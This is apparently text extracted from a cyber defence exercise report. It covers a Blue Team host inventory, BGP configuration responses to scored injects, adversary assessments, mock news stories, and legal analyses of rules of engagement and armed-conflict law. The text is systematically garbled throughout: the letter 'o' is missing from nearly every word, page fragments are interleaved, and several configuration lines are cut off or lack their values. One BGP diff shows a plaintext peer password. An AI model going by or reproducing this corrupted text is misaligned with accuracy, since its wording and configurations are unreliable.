82 8 f 12 «Zne «IP «MGMT_IP «OS «RAM «Descriptin «Patching «Required Services «rganizatin. Prvides als access ver web interface. (TCP: 443) IMAPS (TCP: 993) POP3S (TCP: 995) SMTP (TCP: 25) mail.milx.ex MIL_DMZ 10.X XX.63 Ubuntu bit 256 External mail server fr Military Missin netwrk allwed HTTP (TCP: 80) HTTPS (TCP: 443) IMAPS (TCP: 993) POP3S (TCP: 995) SMTP (TCP: 25) mgmt-btx.ex MGMT X NA Windws Server Windws hst fr Blue Teams t access vcenter server allwed n scred services nexus1000vx All NA XX Cisc NX-OS 2048 Cisc Nexus 1000v switch fr the whle Blue Team infrastructure (includes bth AID and MIL side) allwed n scred services

83 9 f 12 «Zne «IP «MGMT_IP «OS «RAM «Descriptin «Patching «Required Services «nin.int.milx.ex MIL_INT 10.X XX.36 Ubuntu (Security Onin) 4096 Default installatin f Security Onin fr netwrk mnitring allwed n scred services wnvm-btx.ex TBD TBD XX.TBD TBD 4096 Virtual machine created by Blue Teams themselves allwed n scred services tv.milx.ex MIL_DMZ 10.X XX.65 Ubuntu bit 1024 TV twer PC n MIL side that allws t bradcast news mainly targeted fr the lcals in Blea allwed FTP (TCP: 21) HTTP (TCP: 80) VLC Streaming (TCP: 8080) ws1.int.aidx.ex AID_INT 10.X XX.141 Windws XP SP3 512 Windws XP wrkstatin fr aid rgs allwed CIFS (TCP: 445) RDP (TCP: 3389) ws1.int.milx.ex MIL_INT 10.X XX.131 Windws XP SP3 512 Windws XP wrkstatin fr military units nt allwed CIFS (TCP: 445) RDP (TCP: 3389)

84 10 f 12 «Zne «IP «MGMT_IP «OS «RAM «Descriptin «Patching «Required Services «ws1.wel.milx.ex MIL_WEL 10.X XX.171 Windws Windws wrkstatin allwed CIFS (TCP: 445) RDP (TCP: 3389) ws2.int.aidx.ex AID_INT 10.X XX.142 Windws XP SP3 512 Windws XP wrkstatin fr aid rgs allwed CIFS (TCP: 445) RDP (TCP: 3389) ws2.int.milx.ex MIL_INT 10.X XX.132 Windws XP SP3 512 Windws XP wrkstatin fr military units nt allwed CIFS (TCP: 445) RDP (TCP: 3389) ws2.wel.milx.ex MIL_WEL 10.X XX.172 Windws Windws wrkstatin allwed CIFS (TCP: 445) RDP (TCP: 3389) ws3.int.aidx.ex AID_INT 10.X XX.143 Windws Windws 7 wrkstatin fr aid rgs allwed CIFS (TCP: 445) RDP (TCP: 3389) ws3.int.milx.ex MIL_INT 10.X XX.133 Windws Windws 7 wrkstatin fr military units nt allwed CIFS (TCP: 445) RDP (TCP: 3389)

85 11 f 12 «Zne «IP «MGMT_IP «OS «RAM «Descriptin «Patching «Required Services «ws4.int.aidx.ex AID_INT 10.X XX.144 Windws Windws 7 wrkstatin fr aid rgs allwed CIFS (TCP: 445) RDP (TCP: 3389) ws4.int.milx.ex MIL_INT 10.X XX.134 Windws Windws 7 wrkstatin fr military units nt allwed CIFS (TCP: 445) RDP (TCP: 3389) ws5.int.aidx.ex AID_INT 10.X XX.145 Ubuntu bit 512 Linux wrkstatin fr pwer users in aid rgs allwed SSH (TCP: 22) VNC (TCP: 5901) ws5.int.milx.ex MIL_INT 10.X XX.135 Ubuntu bit 512 Linux wrkstatin fr pwer users in military units nt allwed SSH (TCP: 22) VNC (TCP: 5901) AID_DMZ 10.X XX.85 Ubuntu Server Public web server fr aid rganizatins allwed FTP (TCP: 21) HTTP (TCP: 80) HTTPS (TCP: 443) MIL_DMZ 10.X XX.64 Ubuntu Server 512 PR website fr nt allwed FTP (TCP:

86 12 f 12 «Zne «IP «MGMT_IP «OS «RAM «Descriptin «Patching «Required Services «10.04 the military missin 21) HTTP (TCP: 80) HTTPS (TCP: 443)

87 1 f 7 Cntents 1. Intrductin 2. Redundant Infrastructure 1. Descriptin 2. Scring 3. Respnse frm BT8 4. Respnse frm BT6 3. Adversary Assessment I 1. Descriptin 2. Respnse frm BT8 3. Respnse frm BT7 4. Adversary Assessment II 1. Descriptin 2. Respnse frm BT8 3. Respnse frm BT5 5. Abuse Reprt 1. Descriptin 2. Respnse frm BT4 3. Respnse frm BT8 4. Respnse frm BT7 1. Intrductin In this Annex we prvide mre detailed infrmatin n s called scenari injects that were scred. Fr each inject, the respnses frm the tw r three f the Blue Teams wh were assigned the highest amunt f pints have been included. 2. Redundant Infrastructure 2.1. Descriptin Inject Text: Internet infrastructure in Blea is nt reliable. Therefre the mre redundancy yu have in cnnecting yur netwrks with the ther wrld the better. The main ruter f yur MIL infrastructure csr.milx.ex has physical cnnectivity with tw ther Blue Teams: Blue(((X+8) md 10)+1) and Blue((X md 10)+1). Hwever the link is dwn by default and has nt been cnfigured. Yur task is t agree with yur neighburing Blue Teams t prvide each ther transit in case the links with the primary ISPs wuld g dwn and cnfigure the ruters respectively. Yu have 1 hur t cmplete the task and reprt back via . Injectin time: Beginning f phase Z Z Day 1 Injectin methd: frm [email protected] Inject feedback: t [email protected] with crrect additinal cnf entries.

88 2 f Scring The scring criteria were generated "n the fly" by the Green Team members and therefre the Blue Teams did nt knw what exactly was evaluated. They culd get bnus pints fr best practice usage: Idea crrect, BGP cnfiguratin OK. Cnfiguratin cmplete. Bnus pints fr best practice usage: ttl-sec, max-prefix, peer passwrd, passwrd encryptin, acl-s, prefix-lists, peer-grup, rute-maps, lgging tuning, rpf-check, lcal-prefrence, grace-restart Respnse frm BT8 Here are relevant cnf lines regarding redundant links t partner BTs: diff --git a/csr.cnf b/csr.cnf index edf87cb..ed14c2d a/csr.cnf ,13 interface GigabitEthernet3 negtiatin aut! interface GigabitEthernet4 - n ip address - shutdwn + ip address ip access-grup uplink-in in negtiatin aut! interface GigabitEthernet5 - n ip address - shutdwn + ip address ip access-grup uplink-in in negtiatin aut! interface -142,6 ruter bgp neighbr uplink sft-recnfiguratin inbund neighbr uplink prefix-list uplink-in in neighbr uplink maximum-prefix neighbr peer peer-grup + neighbr peer versin 4 + neighbr peer sft-recnfiguratin inbund + neighbr peer prefix-list uplink-in in + neighbr peer rute-map PEER-in in + neighbr peer maximum-prefix 200 neighbr remte-as neighbr peer-grup uplink neighbr descriptin -150,6 ruter bgp neighbr peer-grup uplink neighbr descriptin ISP2 neighbr rute-map ISP2-in in + neighbr remte-as neighbr peer-grup peer + neighbr descriptin BT7 + neighbr remte-as neighbr peer-grup peer + neighbr descriptin BT9 + neighbr passwrd Vuheeyus2L! ip access-list lgging interval 100

89 3 f 7 ip access-list lg-update threshld -181,6 ip access-list extended uplink-in permit tcp hst gt 1024 hst eq bgp permit tcp hst eq bgp hst gt 1024 established permit tcp hst gt 1024 hst eq bgp + remark --- BGP with neighbrs + permit tcp hst eq bgp hst gt 1024 established + permit tcp hst gt 1024 hst eq bgp + permit tcp hst eq bgp hst gt 1024 established + permit tcp hst gt 1024 hst eq bgp deny tcp any any eq bgp lg remark --- NTP permit udp hst eq ntp hst eq -204,6 ip access-list extended uplink-in deny ip any hst deny ip any hst deny ip any hst deny ip any hst deny ip any hst remark --- ISP links deny ip any deny ip any ,6 ip prefix-list uplink-in seq 30 deny /24 le 32 ip prefix-list uplink-in seq 40 deny /24 le 32 ip prefix-list uplink-in seq 50 permit /0 le 32! +rute-map PEER-in permit 10 + set lcal-preference 90 + set cmmunity 65008:103 +! rute-map ISP1-in permit 10 set lcal-preference 100 set cmmunity 65008: Respnse frm BT6 Interface GigabitEthernet3 ip address n ip redirects n ip unreachables n ip prxy-arp negtiatin aut n mp enabled! interface GigabitEthernet4 ip address n ip redirects n ip unreachables n ip prxy-arp negtiatin aut n mp enabled bgp lg-neighbr-changes bgp graceful-restart restart-time 120 bgp graceful-restart stalepath-time 360 bgp graceful-restart netwrk mask netwrk mask netwrk mask netwrk mask neighbr remte-as neighbr remte-as neighbr remte-as neighbr passwrd C F38167C neighbr ttl-security hps 1 neighbr update-surce GigabitEthernet4 neighbr maximum-prefix restart 2

90 4 f 7 neighbr remte-as neighbr passwrd C4B F1E52 neighbr ttl-security hps 1 neighbr update-surce GigabitEthernet5 neighbr maximum-prefix restart 2 3. Adversary Assessment I 3.1. Descriptin Inject text: Calitin intelligence asks fr a brief assessment f the adversary. Wh are they, hw many are there, hw capable are they, what is their mtivatin and what are their gals? Prvide a reasned summary f up t 500 wrds. Yu have ne hur t reply via . Reprt t HQ. Injectin time: Tw hurs int Phase 2, crdinated with Media bj 3.3. Respnse expected in ne hur. Injectin methd: frm [email protected]. Inject feedback: t [email protected] Respnse frm BT8 Dear HQ, Brief summary regarding ur adversary: 1) We dn't have a slid prf regarding attackers identity. Due t the limited mandate, we d nt have permissin t "actively" gather infrmatin abut attackers (i.e. hack back). Attributin purely based n attackers' IP's and messages left n defaced websites ("hacked by BIT") is nt enugh t make hard claims regarding their identity. Frm cmmanders briefing, calitin intel reprt and game dcumentatin it is speculated that attackers are lcal Blea extremists wh have supprt frm internatinal terrrist. 2) Based n the fact that we have seen three (3) nging attacks at the same time against ur systems and taking int accunt the different skill-sets (web, netwrk etc) which is needed t execute thse attacks we believe that we are dealing with multiple teams r attacker grups whse activities are crdinated. These are nt tasks that 1 r 2 attackers can d by themselves. Adding the fact that ther teams are als under attack we estimate the size f attackers t be mre than 20 persns. 3) We have seen very simple "script-kiddie" style web attacks and lately mre sphisticated attacks against ur mail servers. Regarding capabilities, based n the attacks we have seen they are able t carry ut the fllwing: * web attacks including databases; * attacks against Linux servers and services; * client side attacks n windws systems; * different netwrk and services vulnerability scans. Skill-set: medium. 4) Mtivatin: T cause prblems t AID rganisatin wh is helping t mitigate the chlera epidemic. 5) Gal: Frm the military side, pssibly stealing cnfidential infrmatin. On AID netwrks causing prblems t service availability.

91 5 f 7 Regards, BT Respnse frm BT7 Yu can read the belw infrmatin regarding yur request. - Wh are they? We have identified IP addresses but we can nt assess wh is behind them. Members f BIT are expected t use cyber space t achieve their bjectives. - Hw many are there? Tens f IPs changing dynamically when they are identified. - Hw capable are they? Attackers have a high technical level. We have undergne several sphisticated attacks. Yu can find additinal infrmatin in the "situatinal reprting" (1100Z 13:00Z). - What is their mtivatin? If the attackers are BIT members, mtivatin is ethnic cleansing. - What are their gals? Aid rgs and NATO trps are bjectives since they are trying t prevent ethnic cleansing and prvide relief t the civil ppulatin bth in the nrth and suth areas f the cuntry. 4. Adversary Assessment II 4.1. Descriptin Inject text: Calitin intelligence asks fr a 200-wrd assessment update n the adversary. Yu have 30 minutes t reply via . Injectin time: beginning f 4th Phase. Respnse expected in 30 minutes. Injectin methd: frm [email protected]. Inject feedback: t [email protected]. Ratinale: check if the BT is paying attentin t the news, as well as clues left by the Red Team. Can they put the puzzle tgether? 4.2. Respnse frm BT8 1) Wh? Unfrtunately, we have still n hard evidence regarding attackers' identity. Given the fact that there are lts f attacks against AID systems availability, the lcal extremist speculatins may be crrect. 2) Hw many? Based n the attacks we have seen tday we estimate that attackers have gained additinal resurces (mre peple). We have seen again many multiple attack attempts, plus attacks are getting mre sphisticated and mre vectrs are used. We estimate the attackers' number t be 30 r even mre, they are pssibly rganised int smaller grups and given specific tasks. 3) Capacity - as yesterday, we have seen the fllwing capabilities: * web attacks including databases; * attacks against Linux servers and services; * client side attacks n Windws systems;

92 6 f 7 * different netwrk and services vulnerability scans. In additin, tday we have als seen the fllwing: * well hidden backdrs planted in ur systems which have been deplyed a lng time ag; * attacks against ruting infrastructure (BGP); * spam. Adversary is well resurced and attack activities are crdinated. 4) Mtivatin / Gal: * Disrupt AID services, in rder t cause prblems crdinating chlera epidemic respnse activities. * We have seen mre data-stealing attacks. Stlen data is used t discredit ur public reputatin (released t media) and als used fr cnducting additinal attacks Respnse frm BT5 Sir, All attacking IP addresses have been cnfirmed t cme frm BIT knwn addresses. This infrmatin is based upn cllabratin with ther Blue Teams, internal knwledge databases and attack signatures. We have identified the explits used, the back drs installed in systems and the tls used t explit these vulnerabilities. Frm an attributin pint f view, even tugh the attacks cme frm BIT addresses, these attacking systems may be btnets (pre-cntrlled systems) used by sympathisers as a launching pad. BT is talking t legal t raise the issue. brgds 5. Abuse Reprt 5.1. Descriptin Inject text: Calitin CERT has received an abuse reprt abut a server ( hsting malware n yur netwrk. Please verify this and get back t us in 30 minutes with a summary f facts and what yu have dne t fix the situatin. Injectin time: in 3rd Phase trigger, 30 minutes after RT bj 08c2. Injectin methd: frm [email protected]. Inject feedback: t [email protected] Respnse frm BT4 Hell J6 We haven't fund any malware sites n ur If we did find any, ur steps wuld include stpping the service, deleting the files and remving the accunts. All this after we wuld lg and gather all pssible data fr later analysis Respnse frm BT8 Dear HQ,

93 7 f 7 Regarding yur rder abut investigating pssible malware hsting n * Our experts did nt find any evidence abut malware hsting at ur web server. * We have duble checked ur web server, PHP and!wrdpress cnfiguratin files plus checked all filesystem permissins. Everything is in rder Respnse frm BT7 Gd mrning CERT We have detected attacks against Suffered attacks: a) Directry traversal attack. Malicius IP = b) SQL injectin against /etc/shadw. Malicius IP = c) Sphisticated SQL injectin using autmatic tls. Malicius IP = , , d) Attack against database. Malicius IP = Actins: 1) Filter at Firewall. IPs blcked. 2) Frensic Team is analysing this server lking fr malicius sftware installed. By nw, this team hasn't fund any malware installed. We have just checked ur IDS lking fr malicius activity utbund and ur IDS desn't shw any warning. +++ In any case, thank fr yur infrmatin. We are ging t increase technical resurces fr investigating server. As sn as we find smething we'll infrm yu.

94 1 f 5 Cntents 1. BT1 ignrance: Everything is wrking prperly! 2. NATO Prepares fr Cyber War in Blea 3. BT4: We Will Find These Hackers and Punish Them! 4. Attacking Aid Organisatins Equals t Murder 5. BT5 We Are the Best! But Others TECH ANALYSIS: NATO has difficulties with BGP 7. Members f the Calitin Cnfirm Plans t Hack Back 1. BT1 ignrance: Everything is wrking prperly! Wednesday, April 24th, 2013 Much t LS News surprise, Blue Team 1 sees n prblem in the fact that the site aid1.news.ex has carried the message Hacked by BIT fr the last cuple f hurs. This srt f ptimism stands ut in the middle f difficulties NATO has been experiencing in this cyber war BT1 CHIEF PIO says: April 24, 2013 at 10:29 am DENIAL In relatin t what stated in the article, I firmly want t make a cuple f pints cncerning the statement I was quted fr, Everything is wrking prperly cntained in the title. First, the statement was deprived f its secnd part, althugh we are experiencing minr attempts t the net security. Secnd, and mre imprtant: what I said, crrectly, was exclusively referred t BT1-supprted AID rganizatins. As fr BT7, I expressed ur deepest slidarity. This, fr the sake f the truth and accuracy. G.M. BT1 CHIEF PIO 2. NATO Prepares fr Cyber War in Blea Wednesday, April 24th, 2013

95 2 f 5 H.N. Washingtn Pster Fr the first time, an internatinal peacekeeping frce has deplyed cyber teams t prepare fr a pssible cyber war. This represents a significant fray fr NATO and the UN int the grwing dmain f cyber war. Under the aegis f a NATO Missin under UN Security Cuncil reslutin 1973, 10 cyber teams have frm NATO and Finland have deplyed t Blea. This is the first such deplyment in an internatinal missin, and represents the greatest cntributin cyber defence has made t an internatinal missin s far. NATO has dealt actively with the risk frm cyber attacks since 2007, since tiny NATO Ally Estnia was subject t massive cyber attacks that disabled civilian life in that cuntry fr several days. Estnia is ne f the cuntries prviding a Blue team in the cnflict. Blea is an islated cuntry with IT infrastructure straight ut f the 1980s. T cunter these difficulties, NATO is bringing additinal internet t the cuntry thrugh Satellite uplinks, and is prviding this internet t the lcal ppulatin. Reprts indicate that NATO is inviting lcal Bleans t access the internet free f cst at 15 cyber cafes set up thrughut the cuntries. Several Blue Teams cnfirmed similar versins, quting ne: These cyber cafes are set up next t lcal water and fd distributin centers set up t cunter the nging chlera epidemic in Blea. The Washingtn Pster spke with Blue Teams frm calitin frces deplyed in Blea. Of the 10 teams deplyed, nly 5 respnded t media inquiries. S far, these cyber frces are cnfident in abilities. There were cnflicting reprts abut whether there have been any cyber attacks s far. Blue8 reprts n attacks s far, Blue5 reprts daily attacks against aid rganisatins. The teams were quite cnfident f their capabilities, with Blue8 reprting: Our knwledge abut system administratin is n tp level and we are willing t help thers ut with ur knwledge we re n tp f things. This cnfidence did nt hwever prevent disruptins in the netwrks f Aid1, Aid2 and Aid8 s website, all f which were dwn at varius pints in the last day. It remains unclear hw the cyber missin is integrated int the larger NATO peratin. Blue1 called the cyber peratin a missin within a missin, eching cncerns raised last mnth during Cngressinal testimny that the Alliance still des nt knw hw t integrate cyber int its verall missins. Even thugh NATO has been wrking n interperability and a jint apprach fr decades,

96 3 f 5 natinal differences remain in the teams. The German team respnded t this inquiry in terse legalese, while Italy s cyber team prvided lng and detailed cmment. In cming days, it will be interesting t see hw natinal differences play ut in respnding t cyber attacks. 3. BT4: We Will Find These Hackers and Punish Them! Wednesday, April 24th, 2013 Blue 4 has pened a quest fr the mysterius BIT grup. We will find them and punish them using all available legal means. Whether this means setting up a lcal hacker curt remains t be seen. 4. Attacking Aid Organisatins Equals t Murder Wednesday, April 24th, 2013 BT8 has taken a stand against the hackers damaging their systems, claiming that the attackers are heartless peple wh have n respect t human lives. Althugh BT 8 is nt willing t say ut the ptential attackers and they are hiding behind the cmplicity f attributin, the fingers pint t BIT. BIT is respnsible fr many ther defacement events happening all ver Blea tday. BT 8 has been quick t nte that during the attacks n sensitive data was stlen. In the same their spkespersn admitted that this was simply thanks t the fact that n such data was ever kept n this system. One des wnder what wuld have happened if such data wuld have been there and BIT gt hld f it. 5. BT5 We Are the Best! But Others... Wednesday, April 24th, 2013 With all systems and teams suffering frm heavy attacks frm the still unnamed adversary the BT 5 is basting that they can take whatever cmes. May it be apcalypse fr all they care. The spkespersn fr BT 5 said t ur reprter that they have even been assisting ther teams n what t d and sharing a lt f infrmatin with thers. It seems that nt that much inf is cming back t the team frm thers. Althugh nt expressed directly, BT 5 feels they are superir t ther teams and may even have t g and help the thers ut. 6. TECH ANALYSIS: NATO has difficulties with BGP Thursday, April 25th, 2013 Crabs n Security Blg Pst

97 4 f 5 Surces infrm LSMedia that varius teams in the multinatinal cyber frce in Blea are using the BGP t encrypt cmmunicatins. Blue6, Blue7, Blue8 are attempting t set up encrypted cmmunicatins amngst each ther. Blue6 has been able t establish encrypted cmms with Blue8, but s far has been unsuccessful in encrypting cmms with Blue7. Bth teams pinted at difficulty cnfiguring Blue7 s ruter. Crabs will get t yu with mre analysis as the stry unflds. NOTE: THIS STORY IS UPDATED TO REFLECT FOLLOWING CORRECTIONS: 7. Members f the Calitin Cnfirm Plans t Hack Back Thursday, April 25th, 2013 LS Media has cntacted several Blue Teams t cnfirm rumurs n the calitin planning t launch an ffensive peratin against BIT. Many teams admit that the BIT attacks have becme mre sphisticated: The attackers seem t be experts, we ve seen very cmplex attacks in all systems, bth in Linux, n the net, cmmunicatins devices. The hackers are able t attack in any part f the system, BT7 explained. As t the data leaks f aid rganisatins, BT7 did nt shw much cncern: As far as we can tell it is just persnal data. This is nt critical. Yes, I can cnfirm we have heard abut the plan t hack back, but we need mre time t cnfirm this said the spkespersn fr BT1 prmising t get back with further infrmatin. BT3 refrained frm cmmenting the issue.

98 5 f 5 BT4 said there are n plans t attack back at the mment but BT4 des have such capabilities ready if the need arises. Similarly, BT9 expressed their frustratin abut the situatin: N, we cannt attack, there s a lawyer wh wnt let us d that!. BT6 are cnsidering the ptin but are als afraid f nt being allwed t g n with the peratin: We might change ur mind in the future, BT6 spkespersn said. Sme teams hwever firmly denied these intentins: Offensive capabilities are nt part f the rules f engagement f this peratin, BT5, BT7, BT8, BT10 and BT2 stressed. All steps must be taken in accrdance with the internatinal law, BT2 added.

99 1 f 16 Cntents 1. Inject 1, Day 1 2. Inject 2, Day 1 3. Inject 4, Day 1 4. Inject 1, Day 2 5. Inject 2, Day 2 6. Inject 4, Day 2 1. Inject 1, Day Inject Descriptin Dear legal advisrs, As a natural first step in taking up new respnsibilities, we need t brief ur men and wmen n the imprtant legal issues. I have asked everyne t gather at 07:15Z tmrrw fr a shrt 10-minute briefing, s please take this int accunt and prepare an verview fr them. I specifically want yu t address these tpics: T the extent yu find it relevant, explain what the applicable law is. Explain t yur team members what their legal status is; which requirements they have t cmply with as a result f their status and als what the enemy may d t them as a result f their status. Hw d the rights and bligatins f civilians that accmpany ur missin differ? Hw shuld ur frces present in Blea act when the ppsitin frces cmmit illegal activities, including cyber activities, against them? Since I will nt be able t attend this meeting brief, send the text f the brief t me ( [email protected]) by 08:00Z. Als, please prvide a brief verview (max 300 wrds) f hw it went. Nicle Underwd Head Legal Advisr Jint Cmmand 1.2. Respnse frm Blue Team T the extent yu find it relevant, explain what the applicable law is. Internatinal law applies als t peratins in cyber space, which ur team is tasked t d. We are a calitin military IT team, with a task t prvide and secure military and aid-rganisatins unclassified systems in Blea until aid crisis respnse teams arrive. The calitin is perating under United Natins Security Cuncil mandate. Our military peratins are therefre gverned by internatinal law. Of curse prvisins f wn natinal laws f the Trp Cntributing Natins (TCN) als apply when the TCN cnsiders, what actins it can d in this peratin.

100 2 f 16 Law f armed cnflict applies t calitin peratins, als in cyberspace (calitin is cnducting military peratins in suthern Blea and Nn Internatinal Armed Cnflict currently exists in Blea). Als, prvisins f Eurpean cnventin n human rights has t als taken int accunt by thse calitin members, which are EU-members. Additinally, internatinal human rights law can be applicable in areas under calitin cntrl. Finally, selecting applicable law n Cyber activities can smetimes be legally challenging, since natin can exercise jurisdictin ver persns which are engaged in cyber peratins in its territry, ver cyber infrastructure which is lcated in its territry and smetimes extraterritrially (fr example if act is aimed against certain natin r if the act is cmmitted by its citizen). There are als sme crimes that natins have universal jurisdictin n, fr example war crimes Explain t yur team members what their legal status is; which requirements they have t cmply with as a result f their status and als what the enemy may d t them as a result f their status. Situatin in Blea can be regarded as Nn-Internatinal Armed Cnflict (hstilities between gvernmental armed frces and rganized armed grup (BIT)). We are part f military IT-team f calitin armed frces and therefre we can be regarded as fighters (nt cmbatants). Fr this reasn the enemy may lawfully attack against us. We are authrized t use frce in self-defence r accrding t valid rules f engagement, but we d nt have cmbat immunity. This means that we are nt entitled t prisner f war status and in thery can be prsecuted fr activities that are unlawful accrding t Blean law, if Blean authrities captures us (but since were are n same side with Blean gvernment, this is highly unlikely). All ur actins and cyber-peratins must cmply with the principles f necessity and prprtinality (als thse that d nt qualify as an attack). Als, when emplying new cyber weapn r if altering an existing ne, a legal review has t be cnducted n whether its use wuld cause superfluus injury r unnecessary suffering, is by nature indiscriminate r its use may be expected t breach the rules f armed cnflict applicable in current situatin and if there is any ad hc prvisin f treaty r custmary internatinal law that directly addresses it. If there is a Status f Frces Agreement (SOFA) between Blea and the calitin frces, this might als cntain prvisins regarding ur immunity and status in Blea. (At least we shuld have legal immunity, while cnducting fficial duties) Hw d the rights and bligatins f civilians that accmpany ur missin differ? Civilians are prtected frm attack. Hwever, if they directly participate in hstilities they can be lawfully targeted and lse their prtectin (but nt civilian status). On the ther hand it is nt frbidden (accrding t internatinal law) fr civilians t participate in hstilities. This means that if they are captured while engaging cyber peratins, they culd be prsecuted fr activities that are unlawful accrding t the Blean law (in thery). If there exists SOFA with Blea, als calitin civilian cmpnent is likely t enjy mst f the same legal immunities as the military cmpnent (fr example legal immunity in fficial duties) Hw shuld ur frces present in Blea act when the ppsitin frces cmmit illegal activities, including cyber activities, against them? Calitin frces are perating under UNSC mandate. Calitin frces can use frce either fr self-defence r accrding t valid Rules f Engagements. Calitin frces can als cnduct cyber peratins n these same grunds. Mandate authrizes calitin frces t take all necessary measures t prtect civilians and civilian ppulated areas under threat f attack in Blea. If

101 3 f 16 activities, including cyber activities by the ppsing frces can be cnsidered actins which are endangering civilians and civilian ppulated areas, calitin frces are authrized t cnduct necessary actins in rder t defend them. Offensive actins are currently prhibited by ur Rules f Engagements and thus all actins must be f defensive nature. All illegal activities, including cyber activities cmmitted by the ppsitin frces must be reprted immediately thrugh the chain f cmmand. LEGAD Blue Team Respnse frm Blue Team Overview f briefing In rder adequately prvide ur team with infrmatin n the nature f the cnlflict, applicable law and the status f ur team members and the ROE, we have briefed them this mrning at 07.15Z. Within the timeframe we expanded n the issues at hand and we were even able t have a shrt discussin with ur technical teammembers.the subjects discussed revlved arund direct participatin in the cyber dmain and the terrirrial scpe f applicatin.the merger f views f technical and legal nature prved valuable fr bth sides. In cnclusin, a briefing with fulfilling results by virtue f the diverse nature f the blue teams Presentatin

102 4 f 16

103 5 f 16

104 6 f 16

105 7 f 16

106 8 f Inject 2, Day Inject Descriptin Legads, I need yu t lk at a few issues which were raised by the HQ. Please get back t me by 10:00Z. The ROE f the missin prhibit ffensive cyber peratins. Des this prhibitin apply in any situatin? When can it be vilated (if at all)? Hw des it affect r limit the exercise f the right t self-defence? Can yu nly defend within the brders f the netwrk? A nn-internatinal armed cnflict has t be limited t the territry f the state where the cnflict is taking place. Is this relevant in the cntext f defensive cyber peratins? MGen Alex Ander 2.2. Respnse frm Blue Team Questin 1 The ROE f the missin prhibits ffensive cyber peratins. a. b. c. Des this prhibitin apply in all situatins? The ROE apply t any ffensive cyber situatin, and cannt be vilated. Hwever, the ROE des nt apply t defensive cyber peratins. S: nt in all situatins as was the questin. When can it be vilated (if at all)? It can nt be vilated (as a matter f plicy as this is ne f the ROE), insfar as it cncerns ffensive cyber peratins. Hw des it affect r limit the exercise f the right t self-defense?

107 9 f 16 d. Generally, the system f ROEs is that ROEs d nt inhibit the right f self-defence. Thus, ROE apply t any situatin cvered by them, which des nt include a situatin f self-defence. Can yu nly defend within the brders f the netwrk? The degree t which any ffensive f frward defensive cyber actin (e.g. taken utside f the wn netwrk) can be cnsidered as self-defence is a subject f sme debate. Fr this debate, see J. Bddens Hsang, Self-Defence in Military Operatins: the Interactin between the Legal Bases fr Military Self-Defence and Rules f Engagement, in: Revue de drit militaire et de drit de la guerre; vl. 47, n. 1-2, p / The gal f (extended r unit) self-defence is t repel an attack. Self-defence is gverned by the principles f necessity and prprtinality; therefre an attack against ne s wn netwrks wuld have t have (the threat f) serius cnsequences t warrant mre severe cuntermeasures such as targeting the surce f the attacks by either digital r kinetic means. Fr less threatening attacks, actins in self-defence within ne s wn netwrk, such as patching, firewalls etc. wuld be mre apprpriate given the principles f necessity and prprtinality Questin 2 A nn-internatinal armed cnflict has t be limited t the territry f the state where the cnflict is taking place. Is this relevant in the cntext f defensive cyber peratins? It is relevant fr defensive and ffensive cyber peratins alike, insfar as they are part f the armed cnflict. Sme defensive peratins d nt qualify as hstilities (see the debate in Rule 30 f the Tallinn Manual). Insfar as they d qualify as hstilities, the rules pertaining t the cnduct f hstilities apply t them. The gegraphical scpe f a classic NIAC (internal armed cnflict r civil war) is limited t the territry f the state invlved (as it is by definitin nn-internatinal in nature). This fllws frm the reading f Cmmn Article 3 t the Geneva Cnventins (CA3). This implies that military peratins as part f this NIAC are limited t the territry f the state. Hwever, mdern analysis and dctrine f armed cnflicts, especially the cnflicts ften referred t as 'transnatinal armed cnflicts', resulted in a mre liberal interpretatin. Mdern NIAC are ften mre suitable characterized by the nature f the warring parties invlved than by its gegraphy. The essence f NIAC being an armed cnflict in which at least ne nn-state actr is invlved. This may taking place n the territry f the state party t this cnflict, but als utside its territry. This interpretatin is used by i.a. Liesbeth Zegveld in Accuntability f armed ppsitin grups in internatinal law. Cambridge: Cambridge University Press (2002), p. 136: The cnclusin is that internal cnflicts are distinguished frm internatinal nflicts by the parties invlved rather than by the territrial scpe f the cnflict. This reading is shared by Marc Sassòli in Transnatinal Armed Grups and Internatinal Humanitarian Law, Harvard University, (Winter 2006) (benaderd: ). p. 9; and D. Jinks (2003a), September 11 and the laws f war, in: 28 Yale Jurnal f Internatinal Law (Winter 2003), p p. 39. It is als applied by the ICTR in its Statute (see Art. 1 and 7 Statute f the ICTR). The Tallinn manual specifically pays attentin t this phenmenn in Rule 21 (p ), whilst nting tw ppsing views: the classical interpretatin based n gegraphy and the liberal interpretatin based n the status f the warring parties. Defensive cyber peratins in the cntext f the current cnflict in BOOLEA, may be undertaking frm the AOR (lcated in BOOLEA) since the UN mandated frce is n Occupatin frce as mentined in UN SC Reslutin 2066). The effects culd be 'lcated' inside and utside BOOLEA, accrding t the mdern reading n the gegraphical scpe f NIAC's. Mind yu: Mdern reading wuld als suggest that defensive cyber peratins culd als be launched frm the territry f the states participating in the UN mandated frce. 3. Inject 4, Day 1

108 10 f Inject Descriptin Hell! I'm a jurnalist fascinated by the legal side f this cnflict and was given yur address by the calitin's public affairs fficer. I wuld be really interested in hearing yur pinin n the issues belw. Please respnd by the end f the day, as I am n a deadline. I read frm a reprt that this is a nn-internatinal armed cnflict. Hw can this be the case when 9 natins and NATO are present in Blea with military frces? What is cyber warfare, after all? Hw d yu as a lawyer understand it? Is what s happening in Blea cyber warfare? D yu think we need new rules, a new treaty fr cyber warfare? With cyber crime, this is exactly what happened a special treaty was signed. I have a cpy f the Blean penal cde here, and by lking at its prvisins n cyber, it seems that any cyber activity is illegal. Des this mean that shuld the Calitin be cmmanded t cnduct cyber attacks, yu will face the threat f prsecutin by Blean authrities? I wuld appreciate if yu culd get back t me tday because my stry will be published already tmrrw. Thank yu in advance! Jerry Hbbs 3.2. Respnse frm Blue Team 2 Frm BT2 TO: Jerry Hbbs Dear Teams, Hell! I'm a jurnalist fascinated by the legal side f this cnflict and was given yur address by the calitin's public affairs fficer. I wuld be really interested in hearing yur pinin n the issues belw. *Please respnd by the end f the day, as I am n a deadline.* I read frm a reprt that this is a nn-internatinal armed cnflict. Hw can this be the case when 9 natins and NATO are present in Blea with military frces? The Law f Armed Cnflcit (LOAC), distinguishes tw types f armed cnflict: internatinal armed cnflicts, between tw r mre States, and Nn-internatinal armed cnflicts, between gvernmental frces and nn-gvernmental armed grups, r between such grups nly. In the Blean situatin a cnflict is ging n between the Blean Gvernment and ppsing frces (i.e. extremists i.a. the BIT). The internatinal UN Mandated frce is als subject t attacks by extremists grups. The UN mandated frce is nt in a cnflict with the Blean gvernmental frces. Hence the cnflict is between gvernmental frces (Blean and/r Trp Cnstibuting Cuntries t the UN mandated missin) n the ne hand, and vilent extremists (i.a. the BIT) n the ther hand. Althugh a lt f natins 